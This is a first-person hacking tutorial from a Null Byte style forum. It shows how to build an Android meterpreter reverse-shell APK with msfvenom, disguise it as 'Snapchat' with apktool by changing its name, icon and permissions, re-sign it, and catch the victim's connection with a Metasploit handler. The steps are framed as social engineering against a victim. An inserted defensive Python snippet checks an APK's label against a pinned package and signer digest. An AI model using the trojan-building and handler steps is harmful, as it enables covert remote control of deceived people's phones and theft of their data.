Well hello dear readers of Null Byte,
let me start off by stating that English is not my first language and there will be some grammar mistakes. This is also my first tutorial, so don't hesitate to give me feedback :)
You may have made a malicious apk (Android package) before on Kali. It is done the same way you make a malicious exe: with msfvenom.
In this short tutorial I will show you how to change the icon, permissions, and name of the app, to make it more convincing for your victim. This can be very relevant when you are social engineering someone.
Step 1: Making the Malicious Apk
So, let's start off by making our meterpreter apk. Enter this code in the terminal:
msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk
This will create app.apk in your current folder.
Now comes the hard part.
Step 2: Installing Apktool
You will need to install Apktool on your system. I used Windows for this, but it should be done the same way on Linux/macOS. Since this is different for everybody, I won't cover installing this tool. Check out their website for your system.
Do note that Apktool is installed by default in the reverse engineering toolkit from Kali Linux!
Step 3: Decompiling Your Apk
First check if you can run apktool properly by running the command:
apktool
If you get the help menu, everything is installed correctly. Now run the command:
apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder
apktool will now decompile app.apk to /pathtoyourfolder/folder. In this new folder you will find some files. Most likely:
- The 'res' folder
- The AndroidManifest.xml file
- The 'smali' folder
- The 'original' folder
- The apktool.yml file
Step 4: Modifying the Files
For this tutorial we are only going to modify the AndroidManifest.xml file and the 'res' folder. First off, open AndroidManifest.xml with your preferred text editor. I am using Notepad++.
You will see something like this:
First off, let's delete a few lines that we will probably not need and that would give the user an extra warning.
Since Null Byte messes with symbols, here is a pastebin with what to do.
You're back? Great.
Now we are going into the 'res' folder. Here you will find the 'values' folder; go into it. You will find 2 files, 1 of them named strings.xml. Once again, open this xml file with your preferred text editor.
You will find the line
Change 'MainActivity' to your preferred app name. I chose the name 'Snapchat', but choose a name which you see fit for your situation.
Save the file and go back up to the /res/ folder.
Create 3 folders named:
- drawable-ldpi-v4
- drawable-mdpi-v4
- drawable-hdpi-v4
You will now need to find an appropriate icon set for your app.
I used the websites Android Asset Studio and resizeimage.net.
The goal is to get 3 png files of the following sizes:
- 36x36 (pixels) for the ldpi folder
- 48x48 for the mdpi folder
- 72x72 for the hdpi folder
Name these png files all 'icon.png' and place them in the appropriate folder.
Step 5: Compiling Your App
This process is very straightforward. Go back to the apktool terminal and enter the following command:
apktool b /pathtoyourfolder/folder
This will create an apk in the newly created 'dist' folder (found in /pathtoyourfolder/folder).
You thought we were done? Almost, just one more step.
Step 6: Signing the Apk
Here is a zip used for signing: Original thread direct link, or if that doesn't work, this mega.co.nz link. Unzip the file and cd into the new folder, now use the command:
java -jar signapk.jar certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk
This will create a file named signed.apk in the new folder which you can send to the victim and they will see a familiar app name and icon.
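The name and icon shown to the user come from the files edited above, and the apk is re-signed with the key from the zip, so its signer certificate cannot be the one used by the publisher of the app it is named after. The following is an added example, not part of the original tutorial: it reads constructed `aapt dump badging` and `apksigner verify --print-certs` output and flags a label that does not match a pinned package name and signer digest. The pin list, package names and digests are placeholders chosen for illustration.

```python
import re

# Constructed pin list: displayed label -> (expected package, expected signer SHA-256).
# Both values are placeholders, not real publisher data.
PINNED = {"snapchat": ("com.example.genuine", "aa" * 32)}

def parse_badging(text):
    """Pull package name and display label out of `aapt dump badging` output."""
    pkg = re.search(r"^package: name='([^']+)'", text, re.M)
    label = re.search(r"^application-label:'([^']*)'", text, re.M)
    return (pkg.group(1) if pkg else None, label.group(1) if label else None)

def parse_signers(text):
    """Collect signer digests from `apksigner verify --print-certs` output."""
    found = re.findall(r"certificate SHA-256 digest: ([0-9a-fA-F]{64})", text)
    return {d.lower() for d in found}

def assess(badging, certs):
    """Return findings for an APK whose label claims a pinned app."""
    pkg, label = parse_badging(badging)
    signers = parse_signers(certs)
    findings = []
    if not signers:
        findings.append("no signer certificate reported")
    pinned = PINNED.get((label or "").strip().lower())
    if pinned:
        exp_pkg, exp_digest = pinned
        if pkg != exp_pkg:
            findings.append(f"label {label!r} but package is {pkg!r}")
        if exp_digest not in signers:
            findings.append(f"label {label!r} not signed by pinned certificate")
    return findings

# Constructed tool output: a relabelled APK, then one matching the pin list.
RELABELLED_BADGING = ("package: name='com.example.repackaged' versionCode='1'\n"
                      "application-label:'Snapchat'\n")
RELABELLED_CERTS = ("Signer #1 certificate DN: CN=Example Test Key\n"
                    "Signer #1 certificate SHA-256 digest: " + "bb" * 32 + "\n")
GENUINE_BADGING = ("package: name='com.example.genuine' versionCode='7'\n"
                   "application-label:'Snapchat'\n")
GENUINE_CERTS = "Signer #1 certificate SHA-256 digest: " + "AA" * 32 + "\n"

if __name__ == "__main__":
    for finding in assess(RELABELLED_BADGING, RELABELLED_CERTS):
        print("FINDING:", finding)
```

The label and icon are whatever the apk's resources say, so the comparison that carries weight is the signer digest against a value obtained from a trusted copy of the app.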
Step 7: Listening for the Connection
Now the final part,
open up Metasploit using:
msfconsole
Open multi/handler
use multi/handler
Set the payload
set payload android/meterpreter/reversetcp
Set LHOST and LPORT
set LPORT (your port)
set LHOST (your host)
And exploit
exploit
Now once they open up the app, you will get an incoming meterpreter shell, sweet right?
I hope you enjoyed my (first) tutorial, so let me know in the comments what you think.
-Bart